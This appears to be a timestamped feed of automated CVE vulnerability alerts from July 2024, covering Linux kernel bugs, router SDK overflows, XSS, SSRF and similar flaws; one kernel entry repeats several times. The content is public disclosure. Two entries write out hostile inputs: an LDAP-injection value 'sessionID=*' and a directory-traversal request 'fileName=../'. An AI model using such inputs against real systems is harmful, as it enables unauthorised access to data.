🚨 CVE-2024-26621In the Linux kernel, the following vulnerability has been resolved:mm: huge_memory: don't force huge page alignment on 32 bitcommit efa7df3e3bb5 ("mm: align larger anonymous mappings on THPboundaries") caused two issues [1] [2] reported on 32 bit system or compatuserspace.It doesn't make too much sense to force huge page alignment on 32 bitsystem due to the constrained virtual address space.[1] https://lore.kernel.org/linux-mm/d0a136a0-4a31-46bc-adf4-2db109a61672@kernel.org/[2] https://lore.kernel.org/linux-mm/CAJuCfpHXLdQy1a2B6xN2d7quTYwg2OoZseYPZTRpU0eHHKD-sQ@mail.gmail.com/🎖@cveNotify |
|
| 2024-07-08 21:37:25 |
🚨 CVE-2024-5971A vulnerability was found in Undertow, where the chunked response hangs after the body was flushed. The response headers and body were sent but the client would continue waiting as Undertow does not send the expected 0\r\n termination of the chunked response. This results in uncontrolled resource consumption, leaving the server side to a denial of service attack. This happens only with Java 17 TLSv1.3 scenarios.🎖@cveNotify |
|
| 2024-07-08 21:37:24 |
🚨 CVE-2024-26621In the Linux kernel, the following vulnerability has been resolved:mm: huge_memory: don't force huge page alignment on 32 bitcommit efa7df3e3bb5 ("mm: align larger anonymous mappings on THPboundaries") caused two issues [1] [2] reported on 32 bit system or compatuserspace.It doesn't make too much sense to force huge page alignment on 32 bitsystem due to the constrained virtual address space.[1] https://lore.kernel.org/linux-mm/d0a136a0-4a31-46bc-adf4-2db109a61672@kernel.org/[2] https://lore.kernel.org/linux-mm/CAJuCfpHXLdQy1a2B6xN2d7quTYwg2OoZseYPZTRpU0eHHKD-sQ@mail.gmail.com/🎖@cveNotify |
|
| 2024-07-08 20:37:24 |
🚨 CVE-2024-26621In the Linux kernel, the following vulnerability has been resolved:mm: huge_memory: don't force huge page alignment on 32 bitcommit efa7df3e3bb5 ("mm: align larger anonymous mappings on THPboundaries") caused two issues [1] [2] reported on 32 bit system or compatuserspace.It doesn't make too much sense to force huge page alignment on 32 bitsystem due to the constrained virtual address space.[1] https://lore.kernel.org/linux-mm/d0a136a0-4a31-46bc-adf4-2db109a61672@kernel.org/[2] https://lore.kernel.org/linux-mm/CAJuCfpHXLdQy1a2B6xN2d7quTYwg2OoZseYPZTRpU0eHHKD-sQ@mail.gmail.com/🎖@cveNotify |
|
| 2024-07-08 19:37:25 |
🚨 CVE-2024-6227A vulnerability in aimhubio/aim version 3.19.3 allows an attacker to cause a denial of service by configuring the remote tracking server to point at itself. This results in the server endlessly connecting to itself, rendering it unable to respond to other connections.🎖@cveNotify |
|
| 2024-07-08 19:37:24 |
🚨 CVE-2024-26621In the Linux kernel, the following vulnerability has been resolved:mm: huge_memory: don't force huge page alignment on 32 bitcommit efa7df3e3bb5 ("mm: align larger anonymous mappings on THPboundaries") caused two issues [1] [2] reported on 32 bit system or compatuserspace.It doesn't make too much sense to force huge page alignment on 32 bitsystem due to the constrained virtual address space.[1] https://lore.kernel.org/linux-mm/d0a136a0-4a31-46bc-adf4-2db109a61672@kernel.org/[2] https://lore.kernel.org/linux-mm/CAJuCfpHXLdQy1a2B6xN2d7quTYwg2OoZseYPZTRpU0eHHKD-sQ@mail.gmail.com/🎖@cveNotify |
|
| 2024-07-08 18:37:43 |
🚨 CVE-2023-4727A flaw was found in dogtag-pki and pki-core. The token authentication scheme can be bypassed with a LDAP injection. By passing the query string parameter sessionID=*, an attacker can authenticate with an existing session saved in the LDAP directory server, which may lead to escalation of privilege.🎖@cveNotify |
|
| 2024-07-08 18:37:37 |
🚨 CVE-2024-1394A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey and ctx. That function uses named return parameters to free pkey and ctx if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the "return nil, nil, fail(...)" pattern, meaning that pkey and ctx will be nil inside the deferred function that should free them.🎖@cveNotify |
|
| 2024-07-08 18:37:36 |
🚨 CVE-2023-6535A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.🎖@cveNotify |
|
| 2024-07-08 18:37:35 |
🚨 CVE-2023-6356A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver and causing kernel panic and a denial of service.🎖@cveNotify |
|
| 2024-07-08 18:37:31 |
🚨 CVE-2024-0567A vulnerability was found in GnuTLS, where a cockpit (which uses gnuTLS) rejects a certificate chain with distributed trust. This issue occurs when validating a certificate chain with cockpit-certificate-ensure. This flaw allows an unauthenticated, remote client or attacker to initiate a denial of service attack.🎖@cveNotify |
|
| 2024-07-08 18:37:30 |
🚨 CVE-2024-0193A use-after-free flaw was found in the netfilter subsystem of the Linux kernel. If the catchall element is garbage-collected when the pipapo set is removed, the element can be deactivated twice. This can cause a use-after-free issue on an NFT_CHAIN object or NFT_OBJECT object, allowing a local unprivileged user with CAP_NET_ADMIN capability to escalate their privileges on the system.🎖@cveNotify |
|
| 2024-07-08 18:37:26 |
🚨 CVE-2023-6610An out-of-bounds read vulnerability was found in smb2_dump_detail in fs/smb/client/smb2ops.c in the Linux Kernel. This issue could allow a local attacker to crash the system or leak internal kernel information.🎖@cveNotify |
|
| 2024-07-08 18:37:25 |
🚨 CVE-2023-5981A vulnerability was found that the response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from response times of ciphertexts with correct PKCS#1 v1.5 padding.🎖@cveNotify |
|
| 2024-07-08 18:37:24 |
🚨 CVE-2020-19909Integer overflow vulnerability in tool_operate.c in curl 7.65.2 via a large value as the retry delay. NOTE: many parties report that this has no direct security impact on the curl user; however, it may (in theory) cause a denial of service to associated systems or networks if, for example, --retry-delay is misinterpreted as a value much smaller than what was intended. This is not especially plausible because the overflow only happens if the user was trying to specify that curl should wait weeks (or longer) before trying to recover from a transient error.🎖@cveNotify |
|
| 2024-07-08 18:07:30 |
🚨 CVE-2024-39484In the Linux kernel, the following vulnerability has been resolved:mmc: davinci: Don't strip remove function when driver is builtinUsing __exit for the remove function results in the remove callback beingdiscarded with CONFIG_MMC_DAVINCI=y. When such a device gets unbound (e.g.using sysfs or hotplug), the driver is just removed without the cleanupbeing performed. This results in resource leaks. Fix it by compiling in theremove callback unconditionally.This also fixes a W=1 modpost warning:WARNING: modpost: drivers/mmc/host/davinci_mmc: section mismatch inreference: davinci_mmcsd_driver+0x10 (section: .data) ->davinci_mmcsd_remove (section: .exit.text)🎖@cveNotify |
|
| 2024-07-08 18:07:29 |
🚨 CVE-2024-39483In the Linux kernel, the following vulnerability has been resolved:KVM: SVM: WARN on vNMI + NMI window iff NMIs are outright maskedWhen requesting an NMI window, WARN on vNMI support being enabled if andonly if NMIs are actually masked, i.e. if the vCPU is already handling anNMI. KVM's ABI for NMIs that arrive simultanesouly (from KVM's point ofview) is to inject one NMI and pend the other. When using vNMI, KVM pendsthe second NMI simply by setting V_NMI_PENDING, and lets the CPU do therest (hardware automatically sets V_NMI_BLOCKING when an NMI is injected).However, if KVM can't immediately inject an NMI, e.g. because the vCPU isin an STI shadow or is running with GIF=0, then KVM will request an NMIwindow and trigger the WARN (but still function correctly).Whether or not the GIF=0 case makes sense is debatable, as the intent ofKVM's behavior is to provide functionality that is as close to realhardware as possible. E.g. if two NMIs are sent in quick succession, theprobability of both NMIs arriving in an STI shadow is infinitesimally lowon real hardware, but significantly larger in a virtual environment, e.g.if the vCPU is preempted in the STI shadow. For GIF=0, the argument isn'tas clear cut, because the window where two NMIs can collide is much largerin bare metal (though still small).That said, KVM should not have divergent behavior for the GIF=0 case basedon whether or not vNMI support is enabled. And KVM has allowedsimultaneous NMIs with GIF=0 for over a decade, since commit 7460fb4a3400("KVM: Fix simultaneous NMIs"). I.e. KVM's GIF=0 handling shouldn't bemodified without a *really* good reason to do so, and if KVM's behaviorwere to be modified, it should be done irrespective of vNMI support.🎖@cveNotify |
|
| 2024-07-08 18:07:26 |
🚨 CVE-2024-39481In the Linux kernel, the following vulnerability has been resolved:media: mc: Fix graph walk in media_pipeline_startThe graph walk tries to follow all links, even if they are not betweenpads. This causes a crash with, e.g. a MEDIA_LNK_FL_ANCILLARY_LINK link.Fix this by allowing the walk to proceed only for MEDIA_LNK_FL_DATA_LINKlinks.🎖@cveNotify |
|
| 2024-07-08 18:07:25 |
🚨 CVE-2024-39479In the Linux kernel, the following vulnerability has been resolved:drm/i915/hwmon: Get rid of devmWhen both hwmon and hwmon drvdata (on which hwmon depends) are devicemanaged resources, the expectation, on device unbind, is that hwmon will bereleased before drvdata. However, in i915 there are two separate codepaths, which both release either drvdata or hwmon and either can bereleased before the other. These code paths (for device unbind) are asfollows (see also the bug referenced below):Call Trace:release_nodes+0x11/0x70devres_release_group+0xb2/0x110component_unbind_all+0x8d/0xa0component_del+0xa5/0x140intel_pxp_tee_component_fini+0x29/0x40 [i915]intel_pxp_fini+0x33/0x80 [i915]i915_driver_remove+0x4c/0x120 [i915]i915_pci_remove+0x19/0x30 [i915]pci_device_remove+0x32/0xa0device_release_driver_internal+0x19c/0x200unbind_store+0x9c/0xb0andCall Trace:release_nodes+0x11/0x70devres_release_all+0x8a/0xc0device_unbind_cleanup+0x9/0x70device_release_driver_internal+0x1c1/0x200unbind_store+0x9c/0xb0This means that in i915, if use devm, we cannot gurantee that hwmon willalways be released before drvdata. Which means that we have a uaf if hwmonsysfs is accessed when drvdata has been released but hwmon hasn't.The only way out of this seems to be do get rid of devm_ and release/freeeverything explicitly during device unbind.v2: Change commit message and other minor code changesv3: Cleanup from i915_hwmon_register on error (Armin Wolf)v4: Eliminate potential static analyzer warning (Rodrigo) Eliminate fetch_and_zero (Jani)v5: Restore previous logic for ddat_gt->hwmon_dev error return (Andi)🎖@cveNotify |
|
| 2024-07-08 18:07:24 |
🚨 CVE-2024-39478In the Linux kernel, the following vulnerability has been resolved:crypto: starfive - Do not free stack bufferRSA text data uses variable length buffer allocated in software stack.Calling kfree on it causes undefined behaviour in subsequent operations.🎖@cveNotify |
|
| 2024-07-08 17:37:31 |
🚨 CVE-2024-34702Botan is a C++ cryptography library. X.509 certificates can identify elliptic curves using either an object identifier or using explicit encoding of the parameters. Prior to 3.5.0 and 2.19.5, checking name constraints in X.509 certificates is quadratic in the number of names and name constraints. An attacker who presented a certificate chain which contained a very large number of names in the SubjectAlternativeName, signed by a CA certificate which contained a large number of name constraints, could cause a denial of service. The problem has been addressed in Botan 3.5.0 and a partial backport has also been applied and is included in Botan 2.19.5.🎖@cveNotify |
|
| 2024-07-08 17:37:30 |
🚨 CVE-2024-39476In the Linux kernel, the following vulnerability has been resolved:md/raid5: fix deadlock that raid5d() wait for itself to clear MD_SB_CHANGE_PENDINGXiao reported that lvm2 test lvconvert-raid-takeover.sh can hang withsmall possibility, the root cause is exactly the same as commitbed9e27baf52 ("Revert "md/raid5: Wait for MD_SB_CHANGE_PENDING in raid5d"")However, Dan reported another hang after that, and junxiao investigatedthe problem and found out that this is caused by plugged bio can't issuefrom raid5d().Current implementation in raid5d() has a weird dependence:1) md_check_recovery() from raid5d() must hold 'reconfig_mutex' to clear MD_SB_CHANGE_PENDING;2) raid5d() handles IO in a deadloop, until all IO are issued;3) IO from raid5d() must wait for MD_SB_CHANGE_PENDING to be cleared;This behaviour is introduce before v2.6, and for consequence, if othercontext hold 'reconfig_mutex', and md_check_recovery() can't updatesuper_block, then raid5d() will waste one cpu 100% by the deadloop, until'reconfig_mutex' is released.Refer to the implementation from raid1 and raid10, fix this problem byskipping issue IO if MD_SB_CHANGE_PENDING is still set aftermd_check_recovery(), daemon thread will be woken up when 'reconfig_mutex'is released. Meanwhile, the hang problem will be fixed as well.🎖@cveNotify |
|
| 2024-07-08 17:37:26 |
🚨 CVE-2024-39474In the Linux kernel, the following vulnerability has been resolved:mm/vmalloc: fix vmalloc which may return null if called with __GFP_NOFAILcommit a421ef303008 ("mm: allow !GFP_KERNEL allocations for kvmalloc")includes support for __GFP_NOFAIL, but it presents a conflict with commitdd544141b9eb ("vmalloc: back off when the current task is OOM-killed"). Apossible scenario is as follows:process-a__vmalloc_node_range(GFP_KERNEL | __GFP_NOFAIL) __vmalloc_area_node() vm_area_alloc_pages() --> oom-killer send SIGKILL to process-a if (fatal_signal_pending(current)) break;--> return NULL;To fix this, do not check fatal_signal_pending() in vm_area_alloc_pages()if __GFP_NOFAIL set.This issue occurred during OPLUS KASAN TEST. Below is part of the log-> oom-killer sends signal to process[65731.222840] [ T1308] oom-kill:constraint=CONSTRAINT_NONE,nodemask=(null),cpuset=/,mems_allowed=0,global_oom,task_memcg=/apps/uid_10198,task=gs.intelligence,pid=32454,uid=10198[65731.259685] [T32454] Call trace:[65731.259698] [T32454] dump_backtrace+0xf4/0x118[65731.259734] [T32454] show_stack+0x18/0x24[65731.259756] [T32454] dump_stack_lvl+0x60/0x7c[65731.259781] [T32454] dump_stack+0x18/0x38[65731.259800] [T32454] mrdump_common_die+0x250/0x39c [mrdump][65731.259936] [T32454] ipanic_die+0x20/0x34 [mrdump][65731.260019] [T32454] atomic_notifier_call_chain+0xb4/0xfc[65731.260047] [T32454] notify_die+0x114/0x198[65731.260073] [T32454] die+0xf4/0x5b4[65731.260098] [T32454] die_kernel_fault+0x80/0x98[65731.260124] [T32454] __do_kernel_fault+0x160/0x2a8[65731.260146] [T32454] do_bad_area+0x68/0x148[65731.260174] [T32454] do_mem_abort+0x151c/0x1b34[65731.260204] [T32454] el1_abort+0x3c/0x5c[65731.260227] [T32454] el1h_64_sync_handler+0x54/0x90[65731.260248] [T32454] el1h_64_sync+0x68/0x6c[65731.260269] [T32454] z_erofs_decompress_queue+0x7f0/0x2258--> be->decompressed_pages = kvcalloc(be->nr_pages, sizeof(struct page *), GFP_KERNEL | __GFP_NOFAIL); kernel panic by NULL pointer dereference. erofs assume kvmalloc with __GFP_NOFAIL never return NULL.[65731.260293] [T32454] z_erofs_runqueue+0xf30/0x104c[65731.260314] [T32454] z_erofs_readahead+0x4f0/0x968[65731.260339] [T32454] read_pages+0x170/0xadc[65731.260364] [T32454] page_cache_ra_unbounded+0x874/0xf30[65731.260388] [T32454] page_cache_ra_order+0x24c/0x714[65731.260411] [T32454] filemap_fault+0xbf0/0x1a74[65731.260437] [T32454] __do_fault+0xd0/0x33c[65731.260462] [T32454] handle_mm_fault+0xf74/0x3fe0[65731.260486] [T32454] do_mem_abort+0x54c/0x1b34[65731.260509] [T32454] el0_da+0x44/0x94[65731.260531] [T32454] el0t_64_sync_handler+0x98/0xb4[65731.260553] [T32454] el0t_64_sync+0x198/0x19c🎖@cveNotify |
|
| 2024-07-08 17:37:25 |
🚨 CVE-2024-39472In the Linux kernel, the following vulnerability has been resolved:xfs: fix log recovery buffer allocation for the legacy h_size fixupCommit a70f9fe52daa ("xfs: detect and handle invalid iclog size set bymkfs") added a fixup for incorrect h_size values used for the initialumount record in old xfsprogs versions. Later commit 0c771b99d6c9("xfs: clean up calculation of LR header blocks") cleaned up the logreover buffer calculation, but stoped using the fixed up h_size valueto size the log recovery buffer, which can lead to an out of boundsaccess when the incorrect h_size does not come from the old mkfstool, but a fuzzer.Fix this by open coding xlog_logrec_hblks and taking the fixed h_sizeinto account for this calculation.🎖@cveNotify |
|
| 2024-07-08 17:37:24 |
🚨 CVE-2023-39017quartz-jobs 2.3.2 and below was discovered to contain a code injection vulnerability in the component org.quartz.jobs.ee.jms.SendQueueMessageJob.execute. This vulnerability is exploited via passing an unchecked argument. NOTE: this is disputed by multiple parties because it is not plausible that untrusted user input would reach the code location where injection must occur.🎖@cveNotify |
|
| 2024-07-08 17:07:32 |
🚨 CVE-2024-34481drupal-wiki.com Drupal Wiki before 8.31.1 allows XSS via comments, captions, and image titles of a Wiki page.🎖@cveNotify |
|
| 2024-07-08 17:07:26 |
🚨 CVE-2024-32498An issue was discovered in OpenStack Cinder through 24.0.0, Glance before 28.0.2, and Nova before 29.0.3. Arbitrary file access can occur via custom QCOW2 external data. By supplying a crafted QCOW2 image that references a specific data file path, an authenticated user may convince systems to return a copy of that file's contents from the server, resulting in unauthorized access to potentially sensitive data. All Cinder and Nova deployments are affected; only Glance deployments with image conversion enabled are affected.🎖@cveNotify |
|
| 2024-07-08 17:07:25 |
🚨 CVE-2024-39937supOS 5.0 allows api/image/download?fileName=../ directory traversal for reading files.🎖@cveNotify |
|
| 2024-07-08 17:07:24 |
🚨 CVE-2024-39936An issue was discovered in HTTP2 in Qt before 5.15.18, 6.x before 6.2.13, 6.3.x through 6.5.x before 6.5.7, and 6.6.x through 6.7.x before 6.7.3. Code to make security-relevant decisions about an established connection may execute too early, because the encrypted() signal has not yet been emitted and processed..🎖@cveNotify |
|
| 2024-07-08 16:37:41 |
🚨 CVE-2023-50381Three os command injection vulnerabilities exist in the boa formWsc functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of HTTP requests can lead to arbitrary command execution. An attacker can send a series of HTTP requests to trigger these vulnerabilities.This command injection is related to the `targetAPSsid` request's parameter.🎖@cveNotify |
|
| 2024-07-08 16:37:40 |
🚨 CVE-2023-50244Two stack-based buffer overflow vulnerabilities exist in the boa formIpQoS functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can send a series of HTTP requests to trigger these vulnerabilities.This stack-based buffer overflow is related to the `entry_name` request's parameter.🎖@cveNotify |
|
| 2024-07-08 16:37:39 |
🚨 CVE-2023-50243Two stack-based buffer overflow vulnerabilities exist in the boa formIpQoS functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can send a series of HTTP requests to trigger these vulnerabilities.This stack-based buffer overflow is related to the `comment` request's parameter.🎖@cveNotify |
|
| 2024-07-08 16:37:36 |
🚨 CVE-2023-50239Two stack-based buffer overflow vulnerabilities exist in the boa set_RadvdInterfaceParam functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This stack-based buffer overflow is related to the `interfacename` request's parameter.🎖@cveNotify |
|
| 2024-07-08 16:37:35 |
🚨 CVE-2023-49595A stack-based buffer overflow vulnerability exists in the boa rollback_control_code functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of network requests can lead to arbitrary code execution. An attacker can send a sequence of requests to trigger this vulnerability.🎖@cveNotify |
|
| 2024-07-08 16:37:34 |
🚨 CVE-2023-49593Leftover debug code exists in the boa formSysCmd functionality of LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623. A specially crafted network request can lead to arbitrary command execution.🎖@cveNotify |
|
| 2024-07-08 16:37:31 |
🚨 CVE-2023-48270A stack-based buffer overflow vulnerability exists in the boa formDnsv6 functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of network requests can lead to arbitrary code execution. An attacker can send a sequence of requests to trigger this vulnerability.🎖@cveNotify |
|
| 2024-07-08 16:37:30 |
🚨 CVE-2023-47677A cross-site request forgery (csrf) vulnerability exists in the boa CSRF protection functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted network request can lead to CSRF. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2024-07-08 16:07:25 |
🚨 CVE-2024-38346The CloudStack cluster service runs on unauthenticated port (default 9090) that can be misused to run arbitrary commands on targeted hypervisors and CloudStack management server hosts. Some of these commands were found to have command injection vulnerabilities that can result in arbitrary code execution via agents on the hosts that may run as a privileged user. An attacker that can reach the cluster service on the unauthenticated port (default 9090), can exploit this to perform remote code execution on CloudStack managed hosts and result in complete compromise of the confidentiality, integrity, and availability of CloudStack managed infrastructure.Users are recommended to restrict the network access to the cluster service port (default 9090) on a CloudStack management server host to only its peer CloudStack management server hosts. Users are recommended to upgrade to version 4.18.2.1, 4.19.0.2 or later, which addresses this issue.🎖@cveNotify |
|
| 2024-07-08 15:37:25 |
🚨 CVE-2023-35854Zoho ManageEngine ADSelfService Plus through 6113 has an authentication bypass that can be exploited to steal the domain controller session token for identity spoofing, thereby achieving the privileges of the domain controller administrator. NOTE: the vendor's perspective is that they have "found no evidence or detail of a security vulnerability."🎖@cveNotify |
|
| 2024-07-08 14:38:12 |
🚨 CVE-2024-21076Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: Offer LOV). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).🎖@cveNotify |
|
| 2024-07-08 14:38:11 |
🚨 CVE-2023-50872The API in Accredible Credential.net December 6th, 2023 allows an Insecure Direct Object Reference attack that discloses partial information about certificates and their respective holder. NOTE: the excellium-services.com web page about this issue mentions "Vendor says that it's not a security issue."🎖@cveNotify |
|
| 2024-07-08 14:38:10 |
🚨 CVE-2024-24486An issue discovered in silex technology DS-600 Firmware v.1.4.1 allows a remote attacker to edit device settings via the SAVE EEP_DATA command.🎖@cveNotify |
|
| 2024-07-08 14:38:06 |
🚨 CVE-2024-23486Plaintext storage of a password issue exists in BUFFALO wireless LAN routers, which may allow a network-adjacent unauthenticated attacker with access to the product's login page may obtain configured credentials.🎖@cveNotify |
|
| 2024-07-08 14:38:05 |
🚨 CVE-2024-31839Cross Site Scripting vulnerability in tiagorlampert CHAOS v.5.0.1 allows a remote attacker to escalate privileges via the sendCommandHandler function in the handler.go component.🎖@cveNotify |
|
| 2024-07-08 14:38:04 |
🚨 CVE-2024-22734An issue was discovered in AMCS Group Trux Waste Management Software before version 7.19.0018.26912, allows local attackers to obtain sensitive information via a static, hard-coded AES Key-IV pair in the TxUtilities.dll and TruxUser.cfg components.🎖@cveNotify |
|
| 2024-07-08 14:38:00 |
🚨 CVE-2023-51142An issue in ZKTeco BioTime v.8.5.4 and before allows a remote attacker to obtain sensitive information.🎖@cveNotify |
|
| 2024-07-08 14:37:59 |
🚨 CVE-2021-47186In the Linux kernel, the following vulnerability has been resolved:tipc: check for null after calling kmemdupkmemdup can return a null pointer so need to check for it, otherwisethe null key will be dereferenced later in tipc_crypto_key_xmit ascan be seen in the trace [1].[1] https://syzkaller.appspot.com/bug?id=bca180abb29567b189efdbdb34cbf7ba851c2a58🎖@cveNotify |
|
| 2024-07-08 14:37:58 |
🚨 CVE-2024-30595Tenda FH1202 v1.2.0.14(408) has a stack overflow vulnerability in the deviceId parameter of the addWifiMacFilter function.🎖@cveNotify |
|
| 2024-07-08 14:37:55 |
🚨 CVE-2023-47246In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.🎖@cveNotify |
|
| 2024-07-08 14:37:54 |
🚨 CVE-2022-2856Insufficient validation of untrusted input in Intents in Google Chrome on Android prior to 104.0.5112.101 allowed a remote attacker to arbitrarily browse to a malicious website via a crafted HTML page.🎖@cveNotify |
|
| 2024-07-08 14:37:53 |
🚨 CVE-2017-16231In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used🎖@cveNotify |
|
| 2024-07-08 12:37:45 |
🚨 CVE-2019-8761This issue was addressed with improved checks. This issue is fixed in macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006, macOS Catalina 10.15. Parsing a maliciously crafted text file may lead to disclosure of user information.🎖@cveNotify |
|
| 2024-07-08 11:38:13 |
🚨 CVE-2024-37999A vulnerability has been identified in Medicalis Workflow Orchestrator (All versions). The affected application executes as a trusted account with high privileges and network access. This could allow an authenticated local attacker to escalate privileges.🎖@cveNotify |
|
| 2024-07-08 11:38:12 |
🚨 CVE-2024-24974The interactive service in OpenVPN 2.6.9 and earlier allows the OpenVPN service pipe to be accessed remotely, which allows a remote attacker to interact with the privileged OpenVPN interactive service.🎖@cveNotify |
|
| 2024-07-08 11:38:11 |
🚨 CVE-2023-28696Cross-Site Request Forgery (CSRF) vulnerability in Harish Chouhan, Themeist I Recommend This allows Cross Site Request Forgery.This issue affects I Recommend This: from n/a through 3.9.0.🎖@cveNotify |
|
| 2024-07-08 10:38:12 |
🚨 CVE-2024-23519Cross-Site Request Forgery (CSRF) vulnerability in M&S Consulting Email Before Download.This issue affects Email Before Download: from n/a through 6.9.7.🎖@cveNotify |
|
| 2024-07-08 10:38:11 |
🚨 CVE-2022-47420Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Online ADA Accessibility Suite by Online ADA allows SQL Injection.This issue affects Accessibility Suite by Online ADA: from n/a through 4.12.🎖@cveNotify |
|
| 2024-07-08 09:38:11 |
🚨 CVE-2023-49188Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ZealousWeb Track Geolocation Of Users Using Contact Form 7 allows Stored XSS.This issue affects Track Geolocation Of Users Using Contact Form 7: from n/a through 2.0.🎖@cveNotify |
|
| 2024-07-08 09:38:10 |
🚨 CVE-2023-26531Cross-Site Request Forgery (CSRF) vulnerability in 闪电博 多合一搜索自动推送管理插件-支持Baidu/Google/Bing/IndexNow/Yandex/头条 allows Cross Site Request Forgery.This issue affects 多合一搜索自动推送管理插件-支持Baidu/Google/Bing/IndexNow/Yandex/头条: from n/a through 4.2.7.🎖@cveNotify |
|
| 2024-07-08 08:38:24 |
🚨 CVE-2024-37389Apache NiFi 1.10.0 through 1.26.0 and 2.0.0-M1 through 2.0.0-M3 support a description field in the Parameter Context configuration that is vulnerable to cross-site scripting. An authenticated user, authorized to configure a Parameter Context, can enter arbitrary JavaScript code, which the client browser will execute within the session context of the authenticated user. Upgrading to Apache NiFi 1.27.0 or 2.0.0-M4 is the recommended mitigation.🎖@cveNotify |
|
| 2024-07-08 07:37:50 |
🚨 CVE-2024-34602Use of implicit intent for sensitive communication in Samsung Messages prior to SMR Jul-2024 Release 1 allows local attackers to get sensitive information. User interaction is required for triggering this vulnerability.🎖@cveNotify |
|
| 2024-07-08 05:38:03 |
🚨 CVE-2023-5090A flaw was found in KVM. An improper check in svm_set_x2apic_msr_interception() may allow direct access to host x2apic msrs when the guest resets its apic, potentially leading to a denial of service condition.🎖@cveNotify |
|
| 2024-07-08 03:37:33 |
🚨 CVE-2024-31897IBM Cloud Pak for Business Automation 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, 22.0.2, 23.0.1, and 23.0.2 vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 288178.🎖@cveNotify |
|
| 2024-07-08 01:37:24 |
🚨 CVE-2024-39723IBM FlashSystem 5300 USB ports may be usable even if the port has been disabled by the administrator. A user with physical access to the system could use the USB port to cause loss of access to data. IBM X-Force ID: 295935.🎖@cveNotify |
|
| 2024-07-08 00:37:45 |
🚨 CVE-2024-5711Cross-site Scripting (XSS) - Stored in GitHub repository stitionai/devika prior to -.🎖@cveNotify |
|
| 2024-07-07 23:38:09 |
🚨 CVE-2024-6539A vulnerability classified as problematic has been found in heyewei SpringBootCMS up to 2024-05-28. Affected is an unknown function of the file /guestbook of the component Guestbook Handler. The manipulation of the argument Content leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-270450 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-07 18:37:43 |
🚨 CVE-2024-3651A vulnerability was identified in the kjd/idna library, specifically within the `idna.encode()` function, affecting version 3.6. The issue arises from the function's handling of crafted input strings, which can lead to quadratic complexity and consequently, a denial of service condition. This vulnerability is triggered by a crafted input that causes the `idna.encode()` function to process the input with considerable computational load, significantly increasing the processing time in a quadratic manner relative to the input size.🎖@cveNotify |
|
| 2024-07-07 16:37:33 |
🚨 CVE-2024-6229A stored cross-site scripting (XSS) vulnerability exists in the 'Upload Knowledge' feature of stangirard/quivr, affecting the latest version. Users can upload files via URL, which allows the insertion of malicious JavaScript payloads. These payloads are stored on the server and executed whenever any user clicks on a link containing the payload, leading to potential data theft, session hijacking, and reputation damage.🎖@cveNotify |
|
| 2024-07-07 00:38:01 |
🚨 CVE-2024-40601An issue was discovered in the MediaWikiChat extension for MediaWiki through 1.42.1. CSRF can occur in API modules.🎖@cveNotify |
|
| 2024-07-07 00:37:54 |
🚨 CVE-2024-40597An issue was discovered in the CheckUser extension for MediaWiki through 1.42.1. It can expose suppressed information for log events. (The log_deleted attribute is not respected.)🎖@cveNotify |
|
| 2024-07-07 00:37:53 |
🚨 CVE-2024-40596An issue was discovered in the CheckUser extension for MediaWiki through 1.42.1. The Special:Investigate feature can expose suppressed information for log events. (TimelineService does not support properly suppressing.)🎖@cveNotify |
|
| 2024-07-06 18:37:30 |
🚨 CVE-2024-6095A vulnerability in the /models/apply endpoint of mudler/localai versions 2.15.0 allows for Server-Side Request Forgery (SSRF) and partial Local File Inclusion (LFI). The endpoint supports both http(s):// and file:// schemes, where the latter can lead to LFI. However, the output is limited due to the length of the error message. This vulnerability can be exploited by an attacker with network access to the LocalAI instance, potentially allowing unauthorized access to internal HTTP(s) servers and partial reading of local files. The issue is fixed in version 2.17.🎖@cveNotify |
|
| 2024-07-06 17:37:51 |
